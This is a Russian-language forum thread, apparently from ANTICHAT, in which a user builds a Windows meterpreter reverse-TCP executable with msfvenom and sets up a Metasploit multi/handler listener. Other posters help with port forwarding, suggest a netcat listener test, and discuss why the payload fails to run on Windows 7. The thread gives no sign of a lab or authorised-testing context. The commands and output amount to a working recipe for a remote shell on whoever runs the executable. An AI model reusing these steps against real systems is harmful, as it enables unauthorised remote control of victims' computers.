ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.02.2018, 21:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Сообщение от Jerri
Jerri said:
↑
pkill -9 ruby и после попробуй запускать.
Не дало решительным образом ничего.
.SpoilerTarget" type="button">Spoiler
Код:
Code:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.
[-] Handler failed to bind to 109.252.62.124:4444:- -[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit
|
|
|
|

11.02.2018, 05:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 20361
Репутация:
46
|
|
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе
а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
а дальше уже плясать от этого
|
|
|
|

11.02.2018, 19:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Сообщение от dmax0fw
dmax0fw said:
↑
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?
Сообщение от dmax0fw
dmax0fw said:
↑
а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.
Ладно, буду изучать в этом направлении подробней. Спасибо!
|
|
|
|

11.02.2018, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 20361
Репутация:
46
|
|
Сообщение от Vovo4ka
Vovo4ka said:
↑
А какой тогда?
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
|
|
|
|

11.02.2018, 21:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Сообщение от dmax0fw
dmax0fw said:
↑
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо
|
|
|
|

12.02.2018, 20:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Сообщение от dmax0fw
dmax0fw said:
↑
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
Верно ли я настроил проброску?
|
|
|
|

12.02.2018, 21:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.
|
|
|
|

14.02.2018, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?
|
|
|
|

14.02.2018, 22:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
разрядность винды какая ?
|
|
|
|

14.02.2018, 22:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 7955
Репутация:
0
|
|
Сообщение от Sensoft
Sensoft said:
↑
разрядность винды какая ?
Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|